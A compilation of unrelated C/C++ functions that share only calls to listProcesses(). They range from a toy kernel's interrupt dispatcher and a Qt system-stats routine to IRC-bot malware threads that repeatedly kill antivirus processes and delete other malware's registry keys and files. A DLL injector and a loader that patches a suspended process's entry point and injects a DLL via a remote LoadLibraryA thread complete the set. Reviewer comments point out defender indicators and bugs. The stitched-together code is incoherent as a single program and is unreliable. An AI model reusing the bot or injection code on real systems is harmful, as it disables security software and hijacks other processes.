/*
 * Thread body: enumerates the process list over and over, passing TRUE as
 * the last listProcesses() argument, and sleeps killer_delay between passes.
 * Given the function's name the trailing TRUE presumably selects the
 * "terminate matching processes" mode of listProcesses() -- its definition
 * is not on this page, so confirm there (other callers on this page use
 * different argument counts, i.e. different listProcesses() variants).
 * The loop has no exit condition, so `return 0` is unreachable and the
 * thread only ends with the process.  For a defender the observable
 * pattern is a fixed-cadence process-snapshot-and-terminate loop.
 */
DWORD WINAPI kill_av(LPVOID param)
{
    while (1) {
        listProcesses(0, NULL, NULL, FALSE, NULL, TRUE);
        Sleep(killer_delay);        /* killer_delay: global, defined elsewhere */
    }
    return 0;                       /* unreachable, see above */
}
/*
 * Same loop as kill_av() but run as a numbered bot thread: param carries the
 * thread slot index cast through LPVOID (the (int) cast truncates on 64-bit).
 * clearthread()/ExitThread() after the loop are unreachable because the loop
 * never breaks, so the slot is presumably never released while the process
 * runs.  As with kill_av(), the meaning of the final TRUE argument is
 * inferred from the name -- confirm against listProcesses().
 */
DWORD WINAPI KillAVThread(LPVOID param)
{
    int threadnum = (int)param;
    while (1) {
        listProcesses(0, NULL, NULL, FALSE, NULL, TRUE);
        Sleep(killer_delay);
    }
    clearthread(threadnum);         /* unreachable */
    ExitThread(0);                  /* unreachable; no return value on this path */
}
/*
 * Interrupt 0x21 system-call dispatcher of the toy kernel.
 *
 * ax selects the service; bx, cx and dx carry its arguments (their meaning
 * depends on the service and is defined by the callee).  An unknown service
 * number prints a diagnostic and returns to the caller.
 */
void handleInterrupt21(int ax, int bx, int cx, int dx)
{
    switch (ax) {
    case 0x0:                       /* print string */
        printString(bx);
        break;
    case 0x1:                       /* read string */
        readString(bx);
        break;
    case 0x2:                       /* read sector */
        readSector(bx, cx);
        break;
    case 0x3:                       /* read file */
        readFile(bx, cx);
        break;
    case 0x4:                       /* execute program, no waiting parent */
        executeProgram(bx, NOONE);
        break;
    case 0x5:                       /* terminate current program */
        terminate();
        break;
    case 0x6:                       /* write sector */
        writeSector(bx, cx);
        break;
    case 0x7:                       /* delete file */
        deleteFile(bx);
        break;
    case 0x8:                       /* write file */
        writeFile(bx, cx, dx);
        break;
    case 0x9:                       /* kill process */
        killProcess(bx);
        break;
    case 0xa: {                     /* execute program, blocking the caller */
        int parent;
        /* currentProcess is read with the kernel data segment selected */
        setKernelDataSegment();
        parent = currentProcess;
        restoreDataSegment();
        executeProgram(bx, parent);
        break;
    }
    case 0xb:                       /* list processes */
        listProcesses();
        break;
    case 0xc:                       /* edit string */
        editString(bx);
        break;
    default:
        printString("Interrupt21 got undefined ax.");
        break;
    }
}
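/* Strip the fractional part of a numeric string ("123.45" -> "123").
 * Strings without a '.' are returned unchanged; the previous
 * chop(length() - indexOf(".")) arithmetic wiped such strings out entirely
 * because indexOf() returns -1. */
static QString stripFraction(QString value)
{
    const int dot = value.indexOf('.');
    if (dot >= 0)
        value.truncate(dot);
    return value;
}

/**
 * Gathers every statistic this object tracks and serialises it into one
 * string of "label,value" pairs separated by '#'.
 *
 * Side effects: refreshes the cached metrics through cpuUsage(), memPerc(),
 * netStat(), cpuStats(), getDiskDetails(), osVersion() and listProcesses(),
 * and rewrites bytesTransmitted, bytesReceived, physMem and freePhysMem in
 * place with their unit-converted form (pre-existing behaviour, kept: a
 * second call therefore works on already-converted values).
 *
 * @return the '#'-separated statistics string.
 */
QString sysInfo::getDetailedStats()
{
    cpuUsage();
    memPerc();
    netStat();
    cpuStats();
    getDiskDetails();
    osVersion();
    listProcesses();

    QString stats = "";

    // Network counters; byte totals are converted to a unit string first.
    bytesTransmitted = getSizeUnit(bytesTransmitted);
    bytesReceived = getSizeUnit(bytesReceived);
    stats = stats + "Data Transmitted," + bytesTransmitted
            + "#Data Received," + bytesReceived
            + "#Packets Transmitted," + packetsTransmitted
            + "#Packets Received," + packetsReceived
            + "#Errors Transmitting," + transmitErrors
            + "#Errors Receiving," + receiveErrors;

    stats = stats + "#Number of Processors," + _cpuCount;
    stats = stats + "#Operating System," + osVers;

    // One entry per logical drive.  capacitys/useds are parallel to
    // filesystems; iterate over the shortest so a length mismatch cannot
    // index past the end (QList::at() asserts on out-of-range).
    const int driveCount = qMin(filesystems.length(), qMin(capacitys.length(), useds.length()));
    for (int i = 0; i < driveCount; i++) {
        const QString cap = getSizeUnit(stripFraction(capacitys.at(i)));
        const QString used = getSizeUnit(useds.at(i));
        stats = stats + "#Drive Label," + filesystems.at(i)
                + ",Total Capacity," + cap
                + ",Used Space," + used;
    }

    // Memory and CPU.
    physMem = getSizeUnit(stripFraction(physMem));
    freePhysMem = getSizeUnit(stripFraction(freePhysMem));
    stats = stats + "#Total RAM," + physMem
            + "#Used RAM," + freePhysMem      // NOTE(review): label says "Used" but the value is freePhysMem -- confirm intent
            + "#% RAM in use," + memoryLoad
            + "#% CPU in use," + cpuPerc;

    // Process list, one "#pid,name" entry per process; same parallel-list guard.
    stats = stats + "#Amount of Processes active," + procCount;
    const int processCount = qMin(procIDs.length(), procNames.length());
    for (int j = 0; j < processCount; j++) {
        stats = stats + "#" + procIDs.at(j) + "," + procNames.at(j);
    }

    return stats;
}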
/*
 * Bot command thread for the "proc" (process list) command.
 *
 * param points at an LPROC describing the request (socket, channel, notice /
 * silent / full flags, thread slot).  The struct is copied to a local first
 * and the caller's copy is then marked gotinfo = TRUE, which presumably
 * tells the spawning code that the parameter block may be reused -- confirm
 * against the thread-creation site.  Unless silent, a start line and a
 * completion / failure line are sent to the channel; the final line is also
 * passed to addlog().  The thread releases its slot and ends via
 * ExitThread(), so the DWORD return type is never satisfied (warning only).
 *
 * listProcesses() here is the six-argument variant
 * (sock, chan, notice, NULL, FALSE, full); a result of 0 is treated as success.
 */
DWORD WINAPI listProcessesThread(LPVOID param)
{
    char sendbuf[IRCLINE];
    LPROC lproc = *((LPROC *)param);
    LPROC *lprocp = (LPROC *)param;
    lprocp->gotinfo = TRUE;

    sprintf(sendbuf,"proc »» Listing processes:");
    if (!lproc.silent) irc_privmsg(lproc.sock,lproc.chan,sendbuf,lproc.notice);

    if (listProcesses(lproc.sock,lproc.chan,lproc.notice,NULL, FALSE, lproc.full) == 0)
        sprintf(sendbuf,"proc »» Process list completed.");
    else
        sprintf(sendbuf,"proc »» Process list failed.");

    if (!lproc.silent) irc_privmsg(lproc.sock, lproc.chan, sendbuf, lproc.notice);
    addlog(sendbuf);

    clearthread(lproc.threadnum);
    ExitThread(0);
}
/*
 * Walks the static `viruses` table (registry hive / subkey / value name /
 * executable name per entry, defined elsewhere) and, for every entry whose
 * registry value is present: deletes the value, asks the four-argument
 * listProcesses() variant to terminate the named process (it returns 1 when
 * it did), and deletes the executable from the system directory.  Host
 * artefacts a defender can expect from this routine: RegDeleteValue on the
 * listed values, process termination, and DeleteFile of the listed file
 * names under the directory returned by GetSystemDirectory().
 *
 * Observations on the code as written (not changed here):
 *  - lRet (the RegOpenKeyEx result) is never inspected, so hkey is passed
 *    to RegQueryValueEx/RegCloseKey even when the open failed.
 *  - the key is opened with KEY_READ only, and RegDeleteValue is then
 *    called on that same handle.
 *  - dwSize is initialised once and not reset between iterations, although
 *    RegQueryValueEx updates it in place.
 *  - `current` is 20 bytes and is filled with an unbounded strcpy().
 *  - sendbuf is formatted but never sent or logged; `sock` is created,
 *    handed only to listProcesses(), and never closed.
 *  - the f-prefixed API names (fRegOpenKeyEx, fsocket, ...) are presumably
 *    dynamically resolved function pointers -- confirm in the import code.
 */
void removevirus()
{
    char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
    unsigned char szDataBuf[128];
    SOCKET sock;
    HKEY hkey;
    char sendbuf[IRCLINE];
    char current[20];
    LONG lRet;

    sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    DWORD dwSize = 128;

    for (unsigned int i=0; viruses[i].subkey; i++) {
        lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey);
        if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
            fRegDeleteValue(hkey, viruses[i].value);
            strcpy(current,viruses[i].file);
            //FIXME: Replace the afw kill utils. we dont need to let that loop,
            // when we removed the .exe and the reg key. mayb a static call
            // to KillProcess(); can be inserted here. Something like:
            if(listProcesses(sock,NULL,FALSE,current) == 1)
                sprintf(sendbuf,"[PROC]: Process killed: %s",viruses[i].file);
            else
                sprintf(sendbuf,"[PROC]: Failed to terminate process: %s", viruses[i].file);
            //KillProcess(viruses[i].file);
            GetSystemDirectory(sysdir, sizeof(sysdir));
            sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
            DeleteFile(virusexecuteble);
        }
        fRegCloseKey(hkey);
    }
    sprintf(sendbuf,"[AV]: Antivirus search complete! ");   /* never sent or logged */
    return;
}
/*
 * Entry point of the "sinjector" DLL-injection helper.  Behaviour visible in
 * this block: resolves its own directory from argv[0], reads an INI file
 * next to the executable, derives the DLL path from the INI's "dll" entry,
 * parses a single "/x"-style switch, then either spawns and hooks a new
 * process (spwanAndHook) or injects into an existing PID (injecta); both
 * are defined elsewhere.
 *
 * Switches, as parsed below (usage() holds the authoritative list):
 *   /? or /h   usage
 *   /l         listProcesses() and exit
 *   /x CMD     options.cmdline = CMD; /X additionally sets waitKeyPress
 *   /p PID     inject into PID; /P additionally sets options.suspended
 *   /i PID     dump the IAT of PID (hook disabled)
 *   /u PID     unhook PID (hook and INI loading disabled)
 *
 * Returns 0 on success or when the DLL file is missing, 1 when neither a
 * PID nor a command line was given or the PID cannot be opened.
 *
 * Observations on the code as written (not changed here):
 *  - argv[2] is read for /x, /p, /i and /u without checking argc > 2, and
 *    argv[1] is dereferenced after `if(argc<2) usage(...)` -- that guard
 *    only helps if usage() exits; confirm against usage().
 *  - ini is dereferenced (ini->dll, ini->debuglevel) before the later
 *    `if(ini && ...)` null check.
 *  - `sprintf(cmd,"sinjector.exe called...",pid)` passes an argument the
 *    format string never consumes.
 *  - the OpenProcess() handle used as an existence probe is never closed.
 *  - SetDebugPrivileges() followed by OpenProcess(MAXIMUM_ALLOWED, ...) is
 *    the host-side indicator a defender would look for alongside the
 *    hooking done by injecta()/spwanAndHook().
 */
int main(int argc, char* argv[]) {
    char dllToInject[512],iniFilePath[512];
    char cmd[512];
    DWORD pid=0;
    opt options;
    FILE *in;

    SetDebugPrivileges();
    //printf("%s\n",getfile_fullpath("\\\\.\\pipe\\mojo.6136.4468.15747523823731339023"));
    //return 1;

    /* Directory of this executable: argv[0] made absolute, cut after the last backslash. */
    char basePath[512];
    _fullpath(basePath, argv[0], sizeof(basePath));
    for(char *p=basePath+strlen(basePath);p>basePath;p--){
        if(*p=='\\') { *(p+1)=0; break; }
    }

    //build ini path
    strcpy(iniFilePath,basePath);
    strcat(iniFilePath,INIFILE);

    options.dumpIAT = FALSE;
    options.loadINI = TRUE;
    options.hook = TRUE;
    options.unhook = FALSE;
    options.cmdline = NULL;
    options.waitKeyPress = FALSE;
    options.iniPath = iniFilePath;
    options.suspended=FALSE;

    iniFile *ini=parseIni(iniFilePath);   /* NOTE(review): dereferenced below before any null check */
    options.ini=ini;

    //build dll path
    strcpy(dllToInject,basePath);
    strcat(dllToInject,ini->dll);

    if(argc<2) usage(dllToInject,iniFilePath);

    /* Existence probe only; the stream is closed right away. */
    in=fopen(dllToInject,"r");
    if(in==NULL){
        sprintf(cmd,"Error: DLL to inject NOT FOUND: %s",dllToInject);
        logger(ini,"injector",cmd,strlen(cmd));
        printf("DLL to inject not found... Path:\n");
        printf("%s\n",dllToInject);
        return 0;
    }
    fclose(in);

    if(argc>1 && argv[1][0]=='/'){
        //list processes
        if(argv[1][1]=='?' || argv[1][1]=='h') usage(dllToInject,iniFilePath);
        if(argv[1][1]=='l'){ listProcesses(); exit(0); }
        //read command line
        if(argv[1][1]=='x' || argv[1][1]=='X'){
            options.cmdline=argv[2];
            options.waitKeyPress=argv[1][1]=='X'?TRUE:FALSE;
        }
        //read the pid
        if(argv[1][1]=='p' || argv[1][1]=='P' || argv[1][1]=='i' || argv[1][1]=='u'){
            pid=atoi(argv[2]);
            if(argv[1][1]=='i') {
                options.dumpIAT=TRUE;
                options.hook=FALSE;
                sprintf(cmd,"Dump IAT requested for Pid %d",pid);
                logger(ini,"injector",cmd,strlen(cmd));
            }
            if(argv[1][1]=='u') {
                options.dumpIAT=FALSE;
                options.hook=FALSE;
                options.loadINI=FALSE;
                options.unhook=TRUE;
                sprintf(cmd,"Unhook requested for PID %d",pid);
                logger(ini,"injector",cmd,strlen(cmd));
            }
            if(argv[1][1]=='P') options.suspended=TRUE;
        }
    }

    printf(TITLE"\n");
    if(pid==0 && options.cmdline==NULL) return 1;

    /* Probe that the PID can be opened at all; the handle is not closed or reused. */
    if(pid!=0){
        HANDLE process = OpenProcess(MAXIMUM_ALLOWED, FALSE, pid);
        if(process == NULL) {
            printf("[Error] the specified process couldn't be found. Code: %d\n",GetLastError());
            sprintf(cmd,"Error: Invalid Pid %d",pid);
            logger(ini,"injector",cmd,strlen(cmd));
            return 1;
        }
    }

    if(ini->debuglevel>3){
        sprintf(cmd,"sinjector.exe called...",pid);   /* pid is not consumed by the format string */
        logger(ini,"injector",cmd,strlen(cmd));
        sprintf(cmd,"Ini: %s",iniFilePath);
        logger(ini,"injector",cmd,strlen(cmd));
        sprintf(cmd,"DLL: %s",dllToInject);
        logger(ini,"injector",cmd,strlen(cmd));
    }

    //dump ini options
    if(ini && ini->debuglevel>0){
        printf("[ini] dll=%s\n",*ini->dll?ini->dll:"Error!!!");
        if(ini->monitor) printf("[ini] monitor=%s\n",*ini->monitor?ini->monitor:"none (DISABLED)");
        if(ini->logfile) printf("[ini] logfile=%s\n",*ini->logfile?ini->logfile:"none (DISABLED)");
        if(ini->iatfile) printf("[ini] iatfile=%s\n",*ini->iatfile?ini->iatfile:"none (DISABLED)");
        if(ini->backup) printf("[ini] backup=%s\n",*ini->backup?ini->backup:"none (DISABLED)");
        printf("[ini] debuglevel=%d\n",ini->debuglevel);
        printf("[ini] reinject=%d (%s)\n",ini->reinject,ini->reinject?"ENABLED":"DISABLED");
        if(ini->reinject_blacklist) printf("[ini] reinject_blacklist=%s\n",*ini->reinject_blacklist?ini->reinject_blacklist:"none (DISABLED)");
    }else{
        options.loadINI=FALSE;
    }

    if(options.cmdline!=NULL){
        spwanAndHook(dllToInject,&options);
    }else{
        injecta(pid,dllToInject,&options);
    }
    //printf("Press [intro] to exit...\n");
    //getchar();
    return 0;
    /* A commented-out "classic" OpenProcess / VirtualAllocEx /
     * WriteProcessMemory / CreateRemoteThread(LoadLibraryA) variant used to
     * follow here.  It was dead code superseded by injecta() and has been
     * dropped from this listing. */
    return 0;
}
/*
 * Entry point of the "shackle" loader.  Modes, selected by parseArgs()
 * (defined elsewhere) through the opMode / global* variables:
 *   OPMODE_LIST    listProcesses(stringToMatch) and exit;
 *   OPMODE_INJECT  injectIntoProcess(globalInject, dllInput) and exit;
 *   otherwise      start exeInput suspended in directory wdrInput, load
 *                  dllInput into it, then let it run.
 *
 * The default path, as written here:
 *   1. CreateProcess() with CREATE_SUSPENDED + CREATE_NEW_CONSOLE;
 *   2. NtQueryInformationProcess(class 0) for the PEB address,
 *      ReadProcessMemory() of the PEB for ImageBaseAddress, then
 *      guessExecutableEntryPoint() (elsewhere) for the entry point;
 *   3. save the first two entry-point bytes, overwrite them with EB FE
 *      (x86 `jmp $`, a two-byte self-loop), set the main thread's
 *      instruction pointer to the entry and resume it, so the thread spins
 *      there instead of running the program;
 *   4. VirtualAllocEx() + WriteProcessMemory() the DLL path, then
 *      CreateRemoteThread() on kernel32!LoadLibraryA and wait for it;
 *   5. after globalCooldown seconds, suspend the thread, restore the two
 *      original bytes, reset the instruction pointer and resume.
 * For detection purposes that sequence -- suspended create, PEB read, write
 * to the image entry point, SetThreadContext, remote LoadLibraryA thread --
 * is the signal; nothing in this block obscures it.
 *
 * Observations on the code as written (not changed here):
 *  - `derp` is a BOOL compared with NULL; the three FormatMessage() error
 *    paths never LocalFree() the allocated message; malloc() results are
 *    unchecked; exeInput/dllInput/wdrInput leak on every early return;
 *    pi.hProcess / pi.hThread are never closed.
 *  - interactive input is chomp()ed only on the prompt path; the
 *    OPMODE_INJECT prompt leaves the trailing newline in dllInput.
 *  - hNtDll/hKernel are HANDLE rather than HMODULE; the "%08x" prints of
 *    hProcess/addrLoadLibrary and "0x%8x" of a UINT_PTR truncate on 64-bit;
 *    CreateRemoteThread() receives NULL for its DWORD dwCreationFlags;
 *    the VirtualProtectEx/WriteProcessMemory results of the first patch are
 *    not checked.
 *  - the "cave" check reads MAX_PATH bytes from a strlen(dllInput)+1-byte
 *    allocation, so that read may come back short (bR is not checked there).
 *  - PC_REG and PEB_ARCHI are presumably project macros selecting the
 *    32/64-bit context register and PEB layout -- confirm in the headers.
 */
int main(int argc,char **argv) {
    parseArgs(argc, argv);
    SIZE_T bW = 0, bR = 0;
    char *exeInput = (char *)malloc(MAX_PATH);
    char *dllInput = (char *)malloc(MAX_PATH);
    char *wdrInput = (char *)malloc(MAX_PATH);
    memset(exeInput,0,MAX_PATH);
    memset(dllInput,0,MAX_PATH);
    memset(wdrInput,0,MAX_PATH);

    if (opMode == OPMODE_LIST) {
        listProcesses(stringToMatch);
        return 0;
    } else if(opMode == OPMODE_INJECT) {
        if (globalDll == NULL) {
            printf(" [dll] > ");
            fgets(dllInput,MAX_PATH,stdin);       /* no chomp() on this path */
        } else {
            strcpy(dllInput,globalDll);
        }
        injectIntoProcess(globalInject,dllInput);
        return 0;
    }

    /* Resolve exe / dll / working directory: test fixtures, prompts, or globals. */
    if (globalTest) {
        strcpy(exeInput,"test.exe");
        strcpy(dllInput,"shackle.dll");
        strcpy(wdrInput,"c:\\projects\\elegurawolfe\\");
    } else if(globalExeName == NULL || globalWorkingDirectory == NULL || globalDll == NULL) {
        // printf("* SOMETHING MISSING %08x%08x%08x\n", (unsigned long )globalExeName, (unsigned long )globalWorkingDirectory, (unsigned long )globalDll);
        printf(" [exe] > ");
        fgets(exeInput,MAX_PATH,stdin);
        if (globalDll == NULL) {
            printf(" [dll] > ");
            fgets(dllInput,MAX_PATH,stdin);
        } else {
            strcpy(dllInput,globalDll);
        }
        printf(" [wdr] > ");
        fgets(wdrInput,MAX_PATH,stdin);
        chomp(exeInput);
        chomp(dllInput);
        chomp(wdrInput);
    } else {
        strcpy(exeInput,globalExeName);
        strcpy(dllInput,globalDll);
        strcpy(wdrInput,globalWorkingDirectory);
    }

    if (exists(exeInput) == 0) {
        printf(" [FAIL-EXE] %s does not exist\n",exeInput);
        return 0;
    }
    if(exists(dllInput) == 0) {
        printf(" [FAIL-DLL] %s does not exist\n",dllInput);
        return 0;
    }

    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    memset (&pi,0,sizeof(PROCESS_INFORMATION));
    memset (&si, 0, sizeof (STARTUPINFO));
    si.cb = sizeof(si);

    /* NtQueryInformationProcess is a global function pointer (declared elsewhere). */
    HANDLE hNtDll = LoadLibrary("ntdll.dll");
    NtQueryInformationProcess = (_NtQueryInformationProcess )(GetProcAddress( (HMODULE )hNtDll, "NtQueryInformationProcess"));
    HANDLE hKernel = LoadLibrary("kernel32.dll");
    LPVOID addrLoadLibrary = GetProcAddress( (HMODULE )hKernel, "LoadLibraryA");

    BOOL derp = CreateProcess(exeInput, exeInput, NULL, NULL, FALSE, CREATE_SUSPENDED + CREATE_NEW_CONSOLE, NULL, wdrInput, &si, &pi);
    if (derp == NULL) {
        char *errorMessage;
        FormatMessage (FORMAT_MESSAGE_ALLOCATE_BUFFER + FORMAT_MESSAGE_FROM_SYSTEM, 0, GetLastError (), 0, (char *) &errorMessage, 1, NULL);
        printf (" [FAIL] %s", errorMessage);
        return 0;
    }
    HANDLE hProcess = pi.hProcess;
    HANDLE hThread = pi.hThread;
    globalPid = pi.dwProcessId;
    printf(" * [INFO] new process id is %d\n",pi.dwProcessId);

#if ARCHI == 64
    BOOL wow64 = FALSE;
    IsWow64Process(hProcess,&wow64);
    if (wow64 == TRUE) {
        IsDll64Bit(globalDll);      /* result is ignored */
        printf(" [WARN] injecting into wow64 ");
    }
#endif
    printf(" [INFO] process handle is %08x\n",(unsigned long )hProcess);

    /* PEB -> ImageBaseAddress -> entry point of the suspended process. */
    PROCESS_BASIC_INFORMATION pib;
    PEB_ARCHI globalPEB;
    NtQueryInformationProcess (hProcess, 0, (PVOID )(&pib), sizeof (pib),& bW);
    printf(" [INFO] pib.PebBaseAddress = 0x%p (size of field is %d)\n", pib.PebBaseAddress, sizeof(pib.PebBaseAddress));
    ReadProcessMemory (hProcess, pib.PebBaseAddress, &globalPEB, sizeof (globalPEB), &bR);
    if (bR != sizeof (globalPEB)) {
        char *errorMessage;
        FormatMessage (FORMAT_MESSAGE_ALLOCATE_BUFFER + FORMAT_MESSAGE_FROM_SYSTEM, 0, GetLastError (), 0, (char *) &errorMessage, 1, NULL);
        printf (" [FAIL] %s", errorMessage);
        return 0;
    }
    printf(" [INFO] peb.ImageBaseAddress = %p\n", (void *)(globalPEB.ImageBaseAddress));
    UINT_PTR entryPoint = guessExecutableEntryPoint (hProcess, globalPEB.ImageBaseAddress);
    printf(" [INFO] entryPoint = 0x%8x\n", entryPoint);

    /* Save the two original entry bytes and replace them with EB FE (jmp $). */
    char oldEntryChars[2];
    DWORD oldProtect = 0;
    DWORD discardProtect = 0;
    VirtualProtectEx(hProcess,(LPVOID )entryPoint,1, PAGE_READWRITE, &oldProtect);
    ReadProcessMemory(hProcess,(LPCVOID )entryPoint,(char *)oldEntryChars,2,&bR);
    printf(" [INFO] old entry is %02x %02x\n", (unsigned char )oldEntryChars[0],(unsigned char )oldEntryChars[1]);
    printf(" [INFO] writing...\n");
    WriteProcessMemory(hProcess,(LPVOID )entryPoint,"\xEB\xFE",2,&bW);
    VirtualProtectEx(hProcess,(LPVOID )entryPoint,1,oldProtect,&discardProtect);
    char newEntryChars[2];
    ReadProcessMemory(hProcess,(LPCVOID )entryPoint,(char *)newEntryChars,2,&bR);
    if (newEntryChars[0] == '\xEB' && newEntryChars[1] == '\xFE') {
        printf(" [INFO] new entry is %02x %02x\n", (unsigned char )newEntryChars[0],(unsigned char )newEntryChars[1]);
    } else {
        printf(" [INFO] new entry is %02x %02x, something's wrong\n", (unsigned char )newEntryChars[0],(unsigned char )newEntryChars[1]);
        return 0;
    }

    /* Park the main thread on the patched entry and let it run (it spins there). */
    CONTEXT context;
    context.ContextFlags = CONTEXT_FULL;
    GetThreadContext (hThread, &context);
    context.PC_REG = entryPoint;
    SetThreadContext(hThread,&context);
    ResumeThread(pi.hThread);

    /* Copy the DLL path into the target and read it back as a sanity check. */
    LPVOID remoteMemory = VirtualAllocEx(hProcess,NULL,strlen(dllInput) + 1,MEM_COMMIT + MEM_RESERVE, PAGE_READWRITE);
    WriteProcessMemory(hProcess,(LPVOID )remoteMemory,dllInput,strlen(dllInput) + 1,&bW);
    printf(" [INFO] trying to create a remote thread at %08x\n",(unsigned long )addrLoadLibrary);
    char *dllOutput = (char *)malloc(MAX_PATH);
    memset(dllOutput,0,MAX_PATH);
    ReadProcessMemory(hProcess,(LPCVOID )remoteMemory,dllOutput,MAX_PATH,&bR);   /* may read short; bR unchecked */
    printf(" [INFO] confirming process has cave with \"%s\"\n",dllOutput);
    free(dllOutput);

    if(globalWait) {
        printf(" [WAIT] press any key to create remote thread...\n");
        getc(stdin);
    }
    HANDLE threadId = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE )addrLoadLibrary,remoteMemory,NULL,NULL);
    if (threadId == NULL) {
        printf(" [INFO] could not create remote thread\n");
        return 0;
    } else {
        WaitForSingleObject(threadId, INFINITE); //this waits untill thread thread has finished
        // VirtualFree(remoteMemory, 0, MEM_RELEASE); //free myFunc memory
        CloseHandle(threadId);
        // CloseHandle(hProcess);
    }

    int i = globalCooldown;
    for (; i > 0; i--) {
        printf(" [INFO] waiting %d seconds\n",i);
        Sleep(1000);
    }

    /* Put the original two bytes back and restart the main thread at the entry. */
    printf(" [INFO] restoring entrypoint...\n");
    SuspendThread(pi.hThread);
    VirtualProtectEx(hProcess,(LPVOID )entryPoint,1, PAGE_READWRITE, &oldProtect);
    i = WriteProcessMemory(hProcess,(LPVOID )entryPoint,(char *)&oldEntryChars,2,&bW);
    if (i == 0) {
        char *errorMessage;
        FormatMessage (FORMAT_MESSAGE_ALLOCATE_BUFFER + FORMAT_MESSAGE_FROM_SYSTEM, 0, GetLastError (), 0, (char *) &errorMessage, 1, NULL);
        printf (" [FAIL] %s", errorMessage);
        return 0;
    }
    ReadProcessMemory(hProcess,(LPCVOID )entryPoint,(char *)newEntryChars,2,&bR);
    VirtualProtectEx(hProcess,(LPVOID )entryPoint,1, oldProtect, &discardProtect);
    printf(" [INFO] entry restored to %02x %02x\n", (unsigned char )newEntryChars[0],(unsigned char )newEntryChars[1]);
    GetThreadContext (hThread, &context);
    context.PC_REG = entryPoint;
    SetThreadContext(hThread,&context);
    ResumeThread(pi.hThread);
    printf(" [INFO] bye!");

    free(exeInput);
    free(dllInput);
    free(wdrInput);
    return 0;
}